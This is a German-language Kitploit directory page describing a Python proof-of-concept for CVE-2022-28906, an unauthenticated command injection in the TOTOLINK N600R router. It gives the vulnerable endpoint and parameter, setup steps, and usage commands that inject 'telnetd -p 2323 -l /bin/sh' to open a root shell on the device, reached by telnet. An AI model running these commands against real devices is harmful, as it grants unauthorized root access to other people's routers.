Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2022-28906-POC — Python-Proof-of-Concept für eine nicht authentifizierte OS-Befehlsinjektion im TOTOLINK N600R, die den langType-Parameter ausnutzt, um beliebige Befehle auf dem Gerät auszuführen. | Kitploit
Tools/GitHubGitHub/finnvle/cve-2022-28906-poc
IoT-SicherheitSchwachstellenanalyseExploitationWebanwendungs-ExploitationCommand and ControlHardware- & IoT-Sicherheit
GitHubfinnvle/cve-2022-28906-poc

CVE-2022-28906-POC

Python-Proof-of-Concept für eine nicht authentifizierte OS-Befehlsinjektion im TOTOLINK N600R, die den langType-Parameter ausnutzt, um beliebige Befehle auf dem Gerät auszuführen.

Repository anzeigen
18vor 22 TagenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2022-28906 PoC

Python-Proof-of-Concept für eine nicht authentifizierte Befehlsinjektion im TOTOLINK N600R.

Python CVSS

Schwachstelle

ProduktTOTOLINK N600R
FirmwareV5.3c.7159_B20190425
TypOS-Befehlsinjektion (CWE-78)
ParameterlangType
Endpunkt/cgi-bin/cstecgi.cgi
CVSS v3.19.8 Kritisch

Es wurde festgestellt, dass TOTOLink N600R V5.3c.7159_B20190425 eine Schwachstelle für Befehlsinjektion über den langtype-Parameter in /setting/setLanguageCfg enthält.

Einrichtung

root@kitploit:~
python3 -m venv .venv
source .venv/bin/activate
pip install -r requirements.txt

Verwendung

root@kitploit:~
# Verwendung: python3 poc.py <ZIEL> <BEFEHL>
# Beispiel: python3 poc.py 192.168.68.1 "reboot"
# Beispiel: python3 poc.py 192.168.68.1 "telnetd -p 2323 -l /bin/sh"

python3 poc.py <ZIEL> <BEFEHL>

Beispiel-Proof-of-Concept

Verwendung des PoC zur Remote-Ausführung auf dem Ziel, um /bin/sh auf Port 2323 zu aktivieren

root@kitploit:~
python3 poc.py 192.168.68.1 "telnetd -p 2323 -l /bin/sh"

Erfolgreiche PoC-Antwort

Siehe das Ergebnis, ob Port 2323 aktiviert wurde

Nmap zeigt Port 2323 offen

Verbinden Sie sich über Telnet mit Port 2323 mit dem Ziel

root@kitploit:~
telnet 192.168.68.1 2323

Root-Shell-Validierung

Referenzen

  • NVD — CVE-2022-28906
  • CVE-Eintrag — CVE-2022-28906
  • CWE-78 — OS-Befehlsinjektion

Haftungsausschluss

Wird ohne Gewähr bereitgestellt. Der Autor ist nicht verantwortlich für Missbrauch oder Schäden.

Tool herunterladen